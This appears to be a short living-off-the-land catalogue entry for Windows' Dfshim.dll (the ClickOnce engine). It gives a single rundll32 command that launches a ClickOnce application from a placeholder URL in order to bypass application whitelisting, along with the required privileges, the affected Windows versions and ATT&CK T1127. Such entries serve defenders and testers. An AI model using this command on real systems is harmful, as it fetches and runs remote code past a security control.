.. /Dfshim.dll
Star

AWL bypass

ClickOnce engine in Windows used by .NET

Paths:

Resources:

Acknowledgements:

Detections:

AWL bypass

  1. Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)

    rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
    Use case
    Use binary to bypass Application whitelisting
    Privileges required
    User
    Operating systems
    Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1127